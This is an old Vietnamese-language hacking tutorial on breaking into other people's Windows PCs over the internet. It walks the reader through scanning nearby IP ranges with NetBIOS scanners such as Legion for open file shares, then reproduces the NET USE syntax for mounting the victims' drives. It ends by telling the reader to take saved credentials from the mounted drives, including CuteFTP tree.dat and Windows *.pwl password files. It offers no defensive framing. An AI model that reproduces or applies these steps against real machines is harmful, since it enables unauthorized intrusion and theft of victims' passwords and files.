Xâm nhập PC khác khi đang Online : Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.. Bài học
Trang 1Xâm nhập PC khác khi đang Online :
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice
Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và
có thể lấy thông tin của chúng
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner Tôi dùng Legion hoặc Winhackgold ( Download ở đây ) Chương trình sẽ scan tất cả các máy có mở chia sẻ file
trên cùng một netbios
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một
địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình vào Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi
Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào,
bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12)
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 -
254 Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :
Shared resources at \\206.11.11.42
Sharename Type Comment
-
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP
đó
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
Trang 2NET USE drive: | \\computer\directory /DELETE [/YES]
NET USE port: | \\computer\printer /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to ashared directory
* Specifies the next available drive letter
If used with /DELETE, specifies to disconnect all of your connections.port Specifies the parallel (LPT) port name you assign to a shared printer.computer Specifies the name of the computer sharing the resource.directory Specifies the name of the shared
directory.printer Specifies the name of the shared printer.password Specifies the password for the shared resource, if any
? Specifies that you want to be prompted for the password of the shared resource You don't need to use this option unless the password is optional
/SAVEPW:NO Specifies that the password you typeshould not be saved in your password-listfile You need to retype the password the next time you connect to this resource
/YES Carries out the NET USE command without first prompting you to provide
information or confirm actions
/DELETE Breaks the specified connection to a shared resource
/NO Carries out the NET USE command, responding with NO automatically when you are prompted to confirm actions
/HOME Makes a connection to your HOME directory if one is specified in your LAN
Manager or Windows NT user account
To list all of your connections, type NET USE without options
To see this information one screen at a time, type the following at the command prompt:
NET USE /? | MORE
or NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những cái có kiểu \program files\cutètp\tree.dat, \mirc\download, windows\*.pwl